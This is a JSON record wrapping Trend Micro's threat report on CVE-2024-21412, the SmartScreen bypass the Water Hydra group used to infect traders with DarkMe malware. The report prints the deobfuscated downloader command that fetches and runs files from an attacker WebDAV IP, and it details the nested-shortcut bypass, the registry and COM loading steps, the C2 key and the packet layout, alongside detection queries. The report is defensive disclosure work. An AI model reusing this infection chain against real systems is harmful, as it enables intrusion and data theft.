{
	"id": "4eeca7a3-1f59-4235-90a6-0afea27228a0",
	"created_at": "2026-04-06T00:08:09.072442Z",
	"updated_at": "2026-04-10T13:12:29.392134Z",
	"deleted_at": null,
	"sha1_hash": "b48c071ae18a9bef5ea4d462d70436137953a20a",
	"title": "CVE-2024-21412: Water Hydra Targets Traders with Microsoft Defender SmartScreen Zero-Day",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2438499,
	"plain_text": "CVE-2024-21412: Water Hydra Targets Traders with Microsoft\r\nDefender SmartScreen Zero-Day\r\nBy Peter Girnus, Aliakbar Zahravi, Simon Zuckerbraun\r\nPublished: 2024-02-13 · Archived: 2026-04-05 23:51:14 UTC\r\nThe Trend Micro Zero Day Initiative discovered the vulnerability CVE-2024-21412, which we\r\ntrack as ZDI-CAN-23100, and alerted Microsoft of a Microsoft Defender SmartScreen bypass used as part of a\r\nsophisticated zero-day attack chain by the advanced persistent threat (APT) group we track as Water Hydra (aka\r\nDarkCasino) that targeted financial market traders.\r\nIn late December 2023, we began tracking a campaign by the Water Hydra group that contained similar tools, tactics,\r\nand procedures (TTPs) that involved abusing internet shortcuts (.URL) and Web-based Distributed Authoring and\r\nVersioning (WebDAV) components. In this attack chain, the threat actor leveraged CVE-2024-21412 to bypass\r\nMicrosoft Defender SmartScreen and infect victims with the DarkMe malware. In cooperation with Microsoft, the\r\nZDI bug bounty program worked to disclose this zero-day attack and ensure a rapid patch for this\r\nvulnerability. Trend also provides protection to users from threat actors that exploit CVE-2024-21412 via the security solutions that can be found at the end of this blog entry.\r\nAbout the Water Hydra APT group\r\nThe Water Hydra group was first detected in 2021, when it gained notoriety for targeting the financial industry,\r\nlaunching attacks against banks, cryptocurrency platforms, forex and stock trading platforms, gambling sites, and\r\ncasinos worldwide.\r\nInitially, the group’s attacks were attributed to the Evilnum APT group due to similar phishing techniques and other\r\nTTPs. 
In September 2022, researchers at NSFOCUS found the Visual Basic remote access tool\r\n(RAT) called DarkMe as part of a campaign named DarkCasino, which targeted European traders and gambling\r\nplatforms.\r\nBy November 2023, after several successive campaigns, including one that used the well-known WinRAR code\r\nexecution vulnerability CVE-2023-38831 in the attack chain to target stock\r\ntraders, it became evident that Water Hydra was its own APT group distinct from Evilnum.\r\nWater Hydra’s attack patterns show significant levels of technical skill and sophistication, including the ability to use\r\nundisclosed zero-day vulnerabilities in attack chains. For example, the Water Hydra group exploited the\r\naforementioned CVE-2023-38831 as a zero-day to target cryptocurrency traders in April 2023 — months before\r\ndisclosure. Since its disclosure, CVE-2023-38831 has also been exploited by other APT groups such as APT28\r\n(FROZENLAKE), APT29 (Cozy Bear), APT40, Dark Pink, Ghostwriter, Konni, and Sandworm.\r\nWater Hydra attack chain and TTPs\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 1 of 19\n\nThroughout our investigation, we observed the Water Hydra APT group updating and testing new deployments of\r\ntheir attack chain.\r\nFigure 1 shows the original infection chain exploiting CVE-2024-21412. 
Since late January 2024, Water Hydra has\r\nbeen using a streamlined infection process.\r\nIn January 2024, Water Hydra updated its infection chain exploiting CVE-2024-21412 to execute a malicious\r\nMicrosoft Installer File (.MSI), streamlining the DarkMe infection process.\r\nInfection chain analysis\r\nIn this section, we will analyze the full Water Hydra campaign exploiting CVE-2024-21412 to bypass Microsoft\r\nDefender SmartScreen to infect users with DarkMe malware.\r\nIn the attack chain, Water Hydra deployed a spearphishing campaign (T1566.002) on forex trading\r\nforums and stock trading Telegram channels to lure potential traders into infecting themselves with DarkMe malware\r\nusing various social engineering techniques, such as posting messages asking for or providing trading advice and sharing\r\nfake stock and financial tools revolving around graph technical analysis and graph indicator tools, all of which were\r\naccompanied by a URL pointing to a trojan horse stock chart served from a compromised Russian trading and\r\ncryptocurrency information site (fxbulls[.]ru).\r\nIt’s interesting to note that this compromised WordPress site shares the same name as an actual forex broker,\r\nfxbulls[.]com, but is hosted on a Russian (.ru) domain.\r\nThe fxbulls[.]com broker uses the MetaTrader 4 (MT4) trading platform, which was removed from the Apple App\r\nStore in September 2022 due to Western sanctions against Russia. However, Apple reinstated both MT4 and another\r\nMetaTrader version (MT5) by March 2023.\r\nDuring our analysis of the spearphishing campaign on the forex trading forums, we uncovered a considerable number\r\nof posts by Water Hydra in both the English and Russian languages. 
Often, these posts would reply to general forex\r\nor stock trading questions regarding the technical analysis of trading charts and included a link to a stock chart as a\r\nlure.\r\nHowever, instead of the expected stock chart, these posts linked back to an HTM/HTML landing page on a\r\ncompromised Russian-language forex, stock, and cryptocurrency news site hosted on WordPress; that landing page\r\nshows a second malicious link. This lure, disguised as a link to a JPEG file, points to a WebDAV share. Many of\r\nthe accounts we uncovered posting links to the malicious fxbulls[.]ru site were years old, indicating that DarkMe\r\nmay have compromised legitimate user accounts on trading forums as part of its campaign.\r\nThe landing page on fxbulls[.]ru contains a link to a malicious WebDAV share with a filtered, crafted view. When\r\nusers click on this link, the browser will ask them to open the link in Windows Explorer. This is not a security\r\nprompt, so the user might not think that this link is malicious.\r\nFigure 6 shows the JPEG trojan horse linking back to a WebDAV share using Windows Advanced Query Syntax\r\n(AQS).\r\nAs the Water Hydra campaign progressed, we noticed a shift to an additional lure in the form of a PDF file. These\r\ninternet shortcuts disguised as PDF files have the same functionality as the JPEG lure that bootstraps the infection\r\nprocess. These PDF lures are also served from the compromised fxbulls[.]ru domain. These PDF lures can be\r\ndelivered via phishing emails in the form of fake financial contracts.\r\nIn this campaign, Water Hydra employs an interesting technique to lure victims into clicking a malicious Internet\r\nShortcut (.url) file. 
This TTP abuses the Microsoft Windows search: application protocol, which is distinct from the\r\nmore common ms-search protocol. The search: protocol, which has been a part of Windows since Vista, invokes the\r\nWindows desktop search application. During the infection chain, Water Hydra uses the search: protocol with\r\ncrafted Advanced Query Syntax (AQS) queries to customize the appearance of the Windows Explorer view in order\r\nto trick victims.\r\nFigure 8 shows the HTML containing the malicious search: URL. Note the following characteristics of the URL:\r\n- It uses the search: application protocol to perform a search for photo_2023-12-29.jpg.\r\n- It uses the crumb parameter to constrain the scope of the search to the malicious WebDAV share.\r\n- It uses the DisplayName element to deceive users into thinking that this is the local Downloads folder.\r\nAfter clicking the link shown in Figure 8, we can see how the Windows Explorer view is presented to the victim\r\n(Figure 8). By using a combination of search protocols, AQS queries, and the DisplayName element, the Water\r\nHydra operators can trick users into believing that the file from the malicious WebDAV server has been downloaded,\r\ntricking them into clicking this malicious file (a fake JPEG image). This Explorer window is a carefully crafted view\r\nof a malicious .url file named photo_2023-12-29.jpg.url. Microsoft Windows automatically hides\r\nthe .url extension, making it appear from the filename that the file is a JPEG image.\r\nCVE-2024-21412 revolves around internet shortcuts. These .url files are simple INI configuration files that take a\r\n“URL=” parameter pointing to a URL. 
While the .url file format is not officially documented, the\r\nURL parameter is the only one required for this file type.\r\nDuring our analysis of this malicious .url file, we also noticed that Water Hydra used the imageres.dll (Windows\r\nImage Resource) icon library to change the default internet shortcut icon to an image icon using the IconFile= and\r\nIconIndex= parameters to further deceive users and add legitimacy to the trojan horse internet shortcut. Through a\r\nsimple double-click of this internet shortcut disguised as a JPEG, the Water Hydra operators can bypass Microsoft\r\nDefender SmartScreen by exploiting CVE-2024-21412 and fully compromise the Windows host.\r\nWhile analyzing the internet shortcut file that exploits CVE-2024-21412, we noticed something unusual. The URL=\r\nparameter of the photo_2023-12-29.jpg.url file pointed to another internet shortcut file hosted on a server with a\r\ndotted quad address (IPv4).\r\nDuring our analysis of the malicious WebDAV share, we were able to obtain all the Water Hydra artifacts, including\r\nthe referenced 2.url internet shortcut. Following this reference trail, we discovered that the 2.url contained the logic\r\nto exploit the previously patched Microsoft Defender SmartScreen bypass identified as CVE-2023-36025. During our recent research, we delved into a campaign targeting this CVE.\r\nIt’s highly unusual to reference an internet shortcut within another internet shortcut. Because of this anomalous\r\nbehavior, we created a proof-of-concept (PoC) to perform further testing and analysis. During this PoC testing, ZDI\r\ndiscovered that the initial shortcut (which referenced the second shortcut) managed to bypass the patch that\r\naddressed CVE-2023-36025, evading SmartScreen protections. 
Through the analysis and testing of an internal PoC,\r\nwe concluded that calling a shortcut within another shortcut was sufficient to evade SmartScreen, which failed to\r\nproperly apply Mark-of-the-Web (MotW), a critical Windows component that alerts users when opening or running\r\nfiles from an untrusted source. After our analysis, we contacted Microsoft MSRC to alert them about an active\r\nSmartScreen zero-day being exploited in the wild and provided them with our proof-of-concept exploit.\r\nBy crafting the Windows Explorer view, Water Hydra is able to entice victims into clicking on an exploit for CVE-2024-21412, which in turn executes code from an untrusted source, relying on Windows being unable to apply MotW\r\ncorrectly and resulting in a lack of SmartScreen protections. The infection chain simply runs in the background and\r\nthe infected user has no knowledge of this.\r\nAfter bypassing SmartScreen, the second 2.url shortcut runs a batch file embedded in a ZIP file from the attacker's\r\nWebDAV share. This batch script copies and executes a DarkMe dynamic-link library (DLL) loader from the\r\nmalicious WebDAV share. It’s alarming that this entire sequence runs without the user's knowledge and without SmartScreen\r\nprotections. The end user is given little to no indication that anything is afoot.\r\nIn Figure 14, Sysinternals Process Explorer displays the malicious batch file's execution. This batch file is the first\r\nscript to be run after the exploitation of CVE-2024-21412 results in the bypassing of SmartScreen protections.\r\nThe screenshot in Figure 15 shows the numerous requests made to the Water Hydra WebDAV share. 
In the WebDAV traffic we\r\ncan observe several Property Find (PROPFIND) requests to retrieve XML-stored properties from the WebDAV\r\nserver.\r\nOnce the exploitation and infection chains are complete, the threat actor connects to its C\u0026C WebDAV server to\r\ndownload a real JPEG file, which has the same name as the Trojan horse JPEG that was used to exploit CVE-2024-21412. This file is then displayed to the victim, who is deceived into thinking that they have opened the JPEG file\r\nthey originally intended to view from their Downloads folder (without any knowledge about the DarkMe infection).\r\nAnalysis of the DarkMe downloader\r\nFile name b3.dll\r\nMD5 409e7028f820e6854e7197cbb2c45d06\r\nSHA-1 d41c5a3c7a96e7a542a71b8cc537b4a5b7b0cae7\r\nSHA-256 bf9c3218f5929dfeccbbdc0ef421282921d6cbc06f270209b9868fc73a080b8c\r\nCompiler Win32 Executable Microsoft Visual Basic 6 [Native]\r\nOriginal name undersets.dll\r\nFile type Win32 DLL\r\nTLSH T18F856B9611E3EFACCAA049B8599FA01184A2CD3580355D73A191CE1BFB3AE13F4177B7\r\nCompilation date 2024-01-04\r\nTable 1. Properties of the DarkMe downloader (b3.dll)\r\nThe DarkMe downloader is a DLL, written in Visual Basic, that is responsible for downloading and executing the\r\nnext-stage payload from the attacker's WebDAV share. The malware carries out its actions by running a series of commands\r\nthrough the cmd.exe command interpreter. Within the malware, these commands are scrambled using a reverse string\r\ntechnique. To execute the commands, it first reconstructs them by employing the Strings.StrReverse method to\r\nreverse the string order back to normal, after which it executes them via the Shell method. It’s important to note that\r\nthe malware is loaded with junk code to disguise its true purpose and to complicate reverse engineering. 
For the sake\r\nof research and easier understanding, all the code snippets in this blog entry are presented in a deobfuscated, cleaner\r\nform.\r\nThe following snippet illustrates how the malware performs the above operations:\r\nThe deobfuscated command line is as follows:\r\ncmd /c copy /b \\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\7z[.]dll %TEMP%\\7z[.]dll\u0026\u0026cmd /c copy /b\r\n\\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\7z[.]exe %TEMP%\\7z[.]exe\u0026\u0026cmd /c\r\n\\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\photo_2023-12-29s[.]jpg\u0026\u0026cmd /c copy /b\r\n\\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\My2[.]zip %TEMP%\\My2[.]zip\u0026\u0026timeout 1\u0026\u0026cmd /c cd\r\n%TEMP%\u0026\u00267z x \"My2[.]zip\" -password-1 -y\u0026\u0026timeout 1\u0026\u0026cmd /c rundll32 undersets[.]dll,\r\nRunDllEntryPointW\u0026\u0026timeout 1\u0026\u0026pause\r\nThe following table shows the executed commands and an explanation of what they do:\r\n \r\nCommand | Details\r\ncmd /c copy /b \\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\7z[.]dll %TEMP%\\7z[.]dll\u0026\u0026cmd /c copy /b \\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\7z[.]exe %TEMP%\\7z[.]exe | Copies 7z.dll and 7z.exe from a WebDAV share located at \\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures to the local temporary folder %TEMP% of an infected system\r\ncmd /c \\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\photo_2023-12-29s[.]jpg | Opens and displays a decoy stock graph photo_2023-12-29s.jpg\r\ncmd /c copy /b \\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\My2[.]zip %TEMP%\\My2[.]zip | Copies My2.zip from a WebDAV share located at \\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures to the local temporary folder %TEMP% of an infected system\r\ntimeout 1 | Pauses the script for 1 second\r\ncmd /c cd %TEMP% | Changes the current directory to the local temporary folder\r\n7z x \"My2[.]zip\" -password-1 -y | Uses the 7z (7-Zip) command-line tool to extract My2[.]zip using the password “assword-1” — the -y flag automatically answers “yes” to all prompts, such as prompts to overwrite files\r\ntimeout 1 | Pauses the script for another second\r\ncmd /c rundll32 undersets[.]dll, RunDllEntryPointW | Executes a DLL file (undersets[.]dll) using rundll32, a legitimate Windows command. RunDllEntryPointW is likely the entry point for the DLL. This is a common technique during malware infections designed to execute code within the context of a legitimate process.\r\ntimeout 1 | Pauses the script for yet another second\r\npause | Waits for the user to press a key before continuing or terminating the process; it is often used for debugging or to keep a command window open\r\nTable 2. The commands executed by the script\r\nAs shown in the final steps of the script, the malware executes the RunDllEntryPointW export function from a DLL\r\nnamed undersets.dll via rundll32.\r\nThe following image shows the contents of My2.zip:\r\nAnalysis of the DarkMe Loader\r\n \r\nFile name undersets.dll\r\nMD5 409e7028f820e6854e7197cbb2c45d06\r\nSHA-1 d41c5a3c7a96e7a542a71b8cc537b4a5b7b0cae7\r\nSHA-256 bf9c3218f5929dfeccbbdc0ef421282921d6cbc06f270209b9868fc73a080b8c\r\nCompiler Win32 Executable Microsoft Visual Basic 6 [Native]\r\nOriginal name undersets.dll\r\nFile type Win32 DLL\r\nTLSH T18F856B9611E3EFACCAA049B8599FA01184A2CD3580355D73A191CE1BFB3AE13F4177B7\r\nCompilation date 2024-01-04\r\nTable 3. 
Properties of the DarkMe loader (undersets.dll)\r\nUpon execution, the malware builds a DarkMe payload by merging the contents of two binary files — a1 and a2 —\r\ninto a single new file, C:\\Users\\admin\\AppData\\Roaming\\OnlineProjects\\OnlineProject.dll.\r\nTo avoid exposing important strings directly within the binary, the malware encodes them in hexadecimal format. It\r\nsubsequently decodes these into their ASCII representations during execution as necessary.\r\nTo simplify research and enhance readability, all the junk code has been removed and hex-encoded data converted to\r\nASCII format.\r\nThe malware constructs and executes the following command, which leverages the reg.exe utility to import registry\r\nsettings from the kb.txt file:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c cd C:\\Users\\admin\\AppData\\Roaming\\OnlineProjects\u0026\u0026cmd /c timeout\r\n1\u0026\u0026cmd /c reg.exe import kb.txt\r\nThese settings are related to registering the DarkMe payload OnlineProject.dll as a COM server and setting up its\r\nconfiguration in the system's registry.\r\nThe following snippet shows the kb.txt registry file content:\r\nFinally, to run the payload, the loader executes the following command to invoke the registered COM class:\r\n\"C:\\Windows\\SysWOW64\\rundll32.exe\" /sta {74A94F46-4FC5-4426-857B-FCE9D9286279}\r\nAnalysis of the DarkMe RAT\r\n \r\nFile name OnlineProject.dll\r\nMD5 93daa51c8af300f9948fe5fd51be3bfb\r\nSHA-1 a2ba225442d7d25b597cb882bb400a3f9722a5d4\r\nSHA-256 d123d92346868aab77ac0fe4f7a1293ebb48cf5af1b01f85ffe7497af5b30738\r\nCompiler Win32 Executable Microsoft Visual Basic 6 [Native]\r\nOriginal name buogaw1.ocx\r\nFile type Win32 DLL\r\nTLSH 
T1bb37ee6ef390e371a4468862785893d570ecb2bf4049a825fb12cb197bd5cfbe1a1713\r\nCompilation date 2024-01-04\r\nTable 4. Properties of the DarkMe RAT (OnlineProject.dll)\r\nThe final payload of this attack is a RAT known as DarkMe. Like the loader and downloader modules, this malware\r\nis a DLL file written in Visual Basic. However, this final module has a higher amount of obfuscation and junk\r\ncode compared to the previous two. The malware communicates with its C\u0026C server using a custom protocol over\r\nTCP.\r\nUpon execution, the malware gathers information from the infected system, including the computer name, username,\r\ninstalled antivirus software, and the title of the active window. It then registers itself with the attacker's C\u0026C server.\r\nTo establish network communication and handle socket messages, the malware creates a hidden window named\r\nSOCKET_WINDOW of the STATIC window class using the CreateWindowEx Windows API. This hidden window facilitates\r\ncommunication with the server by channeling socket data through window messages.\r\nThe C\u0026C domain is encrypted using RC4 and stored in a VB.Form TextBox named Text2022. 
The malware decrypts\r\nit using a hardcoded key, \"noway123!$$#@35@!\".\r\nThe malware then registers the victim’s system with its C\u0026C server by gathering information such as the computer\r\nname, username, installed antivirus software, and the title of the active window.\r\nThe following is an example of the initial network traffic the malware sends to register victims:\r\nThe following is the initial packet structure used by DarkMe:\r\n \r\nPacket | Details\r\n92 | Hardcoded magic value for data exfiltration\r\n0xA9 0xA9 0xA9 | Delimiter\r\nUS | Abbreviated country name retrieved via the GetLocaleInfo API with LCType\r\nUnited States | Name of country retrieved via the GetLocaleInfo API with LCType LOCALE_SENGLISHCOUNTRYNAME\r\n0xA9 | Delimiter\r\nDESKTOP-BFTPUHP/admin | Computer Name/Username\r\n0xA9 | Delimiter\r\n(Microsoft Defender) | Retrieved list of installed antivirus software by utilizing the Windows Management Instrumentation (WMI) service. If there are no antivirus products installed, the malware will use a default value (“No Antivirus”).\r\n0xA9 | Delimiter\r\n123 | Fixed hardcoded value (retrieved from the VB.TextBox Text10aa Text value)\r\n0xA9 | Delimiter\r\nMicrosoft Office Click-to-Run (SxS) | Foreground window title: if no window is open, the malware selects the hidden window title value Microsoft Office Click-to-Run (SxS) from the DarkMe VB.Form\r\n0xA9 | Delimiter\r\nTable 5. Initial packet structure used by DarkMe\r\nTo check the connection with the C\u0026C server, the malware periodically sends a heartbeat packet. The malware sets\r\nup a separate timer called Timer3 with an interval of “5555 milliseconds” for this task. 
Figure 26 shows an example\r\nof this traffic (some variants of DarkMe send a different value):\r\nOnce the malware registers its victim, it then initiates a listener for incoming TCP connections, waiting to receive\r\ncommands from the attacker. Once a command is received, the malware parses and executes it on the infected\r\nsystem. The malware supports a wide range of functionalities. The supported commands allow the malware to\r\nenumerate directory content (STRFLS, STRFL2), execute shell commands (SHLEXE), create and delete directories,\r\nretrieve system drive information (300100), and generate a ZIP file from a given path (ZIPALO), among others.\r\nConclusion\r\nZero-day attacks represent a significant security risk to organizations, as these attacks exploit vulnerabilities that are\r\nunknown to software vendors and have no corresponding security patches. APT groups such as Water Hydra possess\r\nthe technical knowledge and tools to discover and exploit zero-day vulnerabilities in advanced campaigns, deploying\r\nhighly destructive malware such as DarkMe.\r\nIn a previous campaign, Water Hydra exploited CVE-2023-38831 months before organizations could defend\r\nthemselves. After disclosure, CVE-2023-38831 was subsequently deployed in other campaigns by other APT groups.\r\nZDI has noticed several alarming trends in zero-day abuse. First, there exists a trend where zero-days found by\r\ncybercrime groups make their way into attack chains deployed by nation-state APT groups such as APT28\r\n(FROZENLAKE), APT29 (Cozy Bear), APT40, Dark Pink, Ghostwriter, Konni, Sandworm, and more. These groups\r\nemploy these exploits to launch sophisticated attacks, thereby exacerbating risks to organizations. 
Second, the simple\r\nbypass of CVE-2023-36025 by CVE-2024-21412 highlights a broader industry trend in security\r\npatching: APT threat actors can easily circumvent narrow patches by identifying new attack vectors\r\naround a patched software component.\r\nTo make software more secure and protect customers from zero-day attacks, the Trend Zero Day Initiative works with security researchers and vendors to patch and responsibly disclose software vulnerabilities before\r\nAPT groups can deploy them in attacks. The ZDI Threat Hunting team also proactively hunts for zero-day attacks in\r\nthe wild to safeguard the industry.\r\nOrganizations can protect themselves from these kinds of attacks with Trend Vision One™ products, which enable\r\nsecurity teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber\r\nassets. Vision One helps organizations prioritize and address potential risks, including vulnerabilities. It considers\r\ncritical factors such as the likelihood and impact of potential attacks and offers a range of prevention, detection, and\r\nresponse capabilities. This is all backed by advanced threat research, intelligence, and AI, which helps reduce the\r\ntime taken to detect, respond, and remediate issues. Ultimately, Vision One can help improve the overall security\r\nposture and effectiveness of an organization, including against zero-day attacks.\r\nWhen faced with uncertain intrusions, behaviors, and routines, organizations should assume that their system is\r\nalready compromised or breached and work to immediately isolate affected data or toolchains. 
With a broader\r\nperspective and rapid response, organizations can address breaches and protect their remaining systems, especially with\r\ntechnologies such as Trend Micro Endpoint Security products and Trend Micro Network Security products, as well\r\nas comprehensive security solutions such as Trend Micro™ Security Operations products, which can detect, scan, and\r\nblock malicious content across the modern threat landscape.\r\nEpilogue\r\nDuring our investigation into CVE-2024-21412 and Water Hydra, we began tracking additional threat actor activity\r\naround this zero-day. In particular, the DarkGate malware operators began incorporating this exploit into their\r\ninfection chains. We will be providing additional information and analysis on threat actors that have exploited CVE-2024-21412 in a future blog entry. Trend Micro customers are protected from these additional campaigns via virtual\r\npatches for ZDI-CAN-23100.\r\nTrend Protections\r\nThe following protections exist to detect and protect Trend customers against the zero-day CVE-2024-21412 (ZDI-CAN-23100) and the DarkMe malware payload.\r\nPotential Exploitation of Microsoft SmartScreen Detected (ZDI-CAN-23100)\r\nExploitation of Microsoft SmartScreen Detected (CVE-2024-21412)\r\nSuspicious Activities Over WebDav\r\n(productCode:sds OR productCode:pds OR productCode:xes OR productCode:sao) AND eventId:1 AND\r\neventSubId:2 AND objectCmd:\"rundll32.exe\" AND objectCmd:/fxbulls/ AND ( objectCmd:.url OR\r\nobjectCmd:.cmd)\r\n(productCode:sds OR productCode:pds OR productCode:xes OR productCode:sao) AND eventId:1 AND\r\neventSubId:2 AND objectCmd:\"rundll32.exe\" AND objectCmd:/underwall/ AND ( objectCmd:.url OR\r\nobjectCmd:.cmd)\r\neventId:\"100101\" AND (request:\"*84.32.189.74*\" OR request:\"87iavv.com\")\r\neventId:3 AND (src:\"84.32.189.74*\" OR 
dst:\"84.32.189.74*\")\r\nproductCode:(pdi OR xns OR pds OR sds OR stp OR ptp OR xcs) AND (eventId:(100115 OR 100119) OR\r\neventName:INTRUSION_DETECTION) AND (src:\"84.32.189.74*\" OR dst:\"84.32.189.74*\")\r\n43700 - HTTP: Microsoft Windows Internet Shortcut SmartScreen Bypass Vulnerability\r\n43701 - ZDI-CAN-23100: Zero Day Initiative Vulnerability (Microsoft Windows SmartScreen)\r\n43266 - TCP: Backdoor.Win32.DarkMe.A Runtime Detection\r\n4983: CVE-2024-21412 - Microsoft Windows SmartScreen Exploit - HTTP(Response)\r\n1011949 - Microsoft Windows Internet Shortcut SmartScreen Bypass Vulnerability (CVE-2024-21412)\r\n1011950 - Microsoft Windows Internet Shortcut SmartScreen Bypass Vulnerability Over SMB (CVE-2024-21412)\r\n1011119 - Disallow Download Of Restricted File Formats (ATT\u0026CK T1105)\r\n1004294 - Identified Microsoft Windows Shortcut File Over WebDav\r\n1005269 - Identified Download Of DLL File Over WebDav (ATT\u0026CK T1574.002)\r\n1006014 - Identified Microsoft BAT And CMD Files Over WebDav\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nAcknowledgments\r\nThe Zero Day Initiative would like to thank the following Trenders for their contributions in ensuring that Trend\r\nMicro customers were protected from this zero-day attack pre-patching:\r\nScott Graham, Mohamad Mokbel, Abdelrahman Esmail, Simon Dulude, Senthil Nathan Sankar, Amit Kumar, and a\r\nspecial thanks to the content writers and marketing teams for helping with this research.\r\nWe would like to thank the Microsoft Security Response Center (MSRC) team for their continued collaboration and\r\ntheir efforts in deploying a patch in a timely manner.\r\nSource: https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html"
	],
	"report_names": [
		"cve202421412-water-hydra-targets-traders-with-windows-defender-s.html"
	],
	"threat_actors": [
		{
			"id": "059b16f8-d4e0-4399-9add-18101a2fd298",
			"created_at": "2022-10-25T15:50:23.29434Z",
			"updated_at": "2026-04-10T02:00:05.380938Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"Evilnum"
			],
			"source_name": "MITRE:Evilnum",
			"tools": [
				"More_eggs",
				"EVILNUM",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "0bc63952-5795-4fc7-85c1-50a7f207f2f0",
			"created_at": "2023-11-14T02:00:07.095723Z",
			"updated_at": "2026-04-10T02:00:03.450401Z",
			"deleted_at": null,
			"main_name": "DarkCasino",
			"aliases": [],
			"source_name": "MISPGALAXY:DarkCasino",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4",
			"created_at": "2025-08-07T02:03:25.096857Z",
			"updated_at": "2026-04-10T02:00:03.659118Z",
			"deleted_at": null,
			"main_name": "NICKEL JUNIPER",
			"aliases": [
				"Konni",
				"OSMIUM ",
				"Opal Sleet "
			],
			"source_name": "Secureworks:NICKEL JUNIPER",
			"tools": [
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "fd4c3ddd-11cc-4192-9c94-ff107d7f8492",
			"created_at": "2023-02-18T02:04:24.06294Z",
			"updated_at": "2026-04-10T02:00:04.644528Z",
			"deleted_at": null,
			"main_name": "Dark Pink",
			"aliases": [
				"Saaiwc Group"
			],
			"source_name": "ETDA:Dark Pink",
			"tools": [
				"Ctealer",
				"Cucky",
				"KamiKakaBot",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"PowerSploit",
				"TelePowerBot",
				"ZMsg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a5bd315b-6220-441f-8ed1-39e194dcd0e3",
			"created_at": "2023-12-01T02:02:33.667762Z",
			"updated_at": "2026-04-10T02:00:04.641333Z",
			"deleted_at": null,
			"main_name": "DarkCasino",
			"aliases": [
				"Water Hydra"
			],
			"source_name": "ETDA:DarkCasino",
			"tools": [
				"CloudEyE",
				"DarkMe",
				"GuLoader",
				"PikoloRAT",
				"vbdropper"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "16f2436b-5f84-44e3-a306-f1f9e92f7bea",
			"created_at": "2023-01-06T13:46:38.745572Z",
			"updated_at": "2026-04-10T02:00:03.086207Z",
			"deleted_at": null,
			"main_name": "APT40",
			"aliases": [
				"ATK29",
				"Red Ladon",
				"MUDCARP",
				"ISLANDDREAMS",
				"TEMP.Periscope",
				"KRYPTONITE PANDA",
				"G0065",
				"TA423",
				"ITG09",
				"Gingham Typhoon",
				"TEMP.Jumper",
				"BRONZE MOHAWK",
				"GADOLINIUM"
			],
			"source_name": "MISPGALAXY:APT40",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b43c8747-c898-448a-88a9-76bff88e91b5",
			"created_at": "2024-02-02T02:00:04.058535Z",
			"updated_at": "2026-04-10T02:00:03.545252Z",
			"deleted_at": null,
			"main_name": "Opal Sleet",
			"aliases": [
				"Konni",
				"Vedalia",
				"OSMIUM"
			],
			"source_name": "MISPGALAXY:Opal Sleet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
